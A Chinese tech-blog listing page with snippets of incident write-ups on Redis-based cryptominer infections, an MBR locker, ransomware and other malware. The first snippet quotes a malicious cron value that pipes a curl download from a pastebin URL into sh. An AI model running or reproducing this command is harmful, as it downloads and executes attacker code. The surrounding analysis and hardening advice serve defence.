原文:记一次redis病毒分析笔记

起因 偶然间发现redis里有一个陌生key:tightsoft,它的值是: root curl fsSL https: pastebin.com raw xbY p Tb sh 看key名就知道这肯定不是我们存的,再看value我警觉了,这是要定时执行脚本啊。 分析 于是我便开始逐层拨开它的面纱,脚本的内容是来源于https: pastebin.com raw xbY p Tb,把它下载到本地后 ...

2018-09-05 15:13 2 944 推荐指数:

查看详情

一次MBR锁机病毒分析

有一天,在机缘巧合之下我获得了一个锁机软件(是多巧合阿喂!),然后兴高采烈的把它拖入了虚拟机里蹂躏(>_<!)。 很巧,软件有虚拟机检测。。。 Emmmm好吧,随便 ...

Fri Dec 08 02:17:00 CST 2017 0 1081
一次病毒分析之旅

0x00 前言 这个病毒应该是比较简单的,别人给我的样本,让我帮忙看看,看样子是很早的一个病毒,针对Windows XP系统的,行为分析很简单,但是想着不能就仅仅分析关键点,要不就把整个结构给逆向出来,弄了两天,搞的差不多了,简单的记录一下。 0x01 基本介绍 整个病毒是4个文件组成 ...

Tue Jan 05 04:58:00 CST 2016 17 4101
一次Linux服务器因redis漏洞的挖矿病毒入侵

中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱。 所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!!!!!!!! 这个病毒能都横向传播,不要以为在外网redis的端口不通就没有事情。只要内网 ...

Sun Apr 14 01:28:00 CST 2019 0 1889
一次利用redis横向移动挖矿分析

该木马使用Linux系统的shell脚本编写Downloader,使用curl与wget命令发起网络请求下载木马的其他组件,虽然代码可被轻易分析,但是编写成本和门槛降低,这也是当前恶意代码使用脚本语言编写的一个趋势。 攻击者通过RCE执行可疑脚本 1.挖矿流程分析图 2.下面分析挖矿程序 ...

Tue Jan 26 01:20:00 CST 2021 0 704
一次部署Hadoop后遭受kthreaddi挖矿病毒

云服务器在部署Hadoop后便被黑了,查看进程发现了kthreaddi占满了CPU。 kill掉这个进程后还会自己重启,猜测是设置了定时启动任务。 查看定时器,查看定时器中的文件,发现文件不存在 ...

Sat May 08 23:59:00 CST 2021 0 1526
一次亲身体验的勒索病毒事件 StopV2勒索病毒

昨天给笔记本装了 windows server 2016 操作系统,配置的差不多之后,想使用注册机激活系统。使用了几个本地以前下载的注册机激活失败后,尝试上网搜索。 于是找到下面这个网站(这个网站下载的注册机是勒索病毒,千万不要在这里下载) 下载的注册机运行后,电脑自带 ...

Thu Feb 27 07:32:00 CST 2020 2 5370
记录一次清理Redis 病毒程序 kdevtmpfsi

首先贴上情况 一个redis 程序占用cpu 46%,虽然redis-server 有定时清理过期的键,但也不会占用这么高的CPU吧,一般都是0.3% 看看这个进程什么鬼 然后找到了它的父亲进程 在 /var/tmp/kinsing 删除 ...

Sun Dec 29 22:59:00 CST 2019 0 1974
一次Redis错误排查经历

日志集中式监控平台上线已经有一段时间,但是大部分情况下只是作为发布或者出问题时查看日志的便利工具使用。平时大家都不怎么主动上去看看。于是前几天把应用的错误日志也加上邮件、Hi和短信报警,马上就收到很多错误报警,引起了大家的重视。其中有一个Redis报错: 看起来挺严重的,拿不到Redis连接 ...

Sat Mar 18 06:56:00 CST 2017 0 2790
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM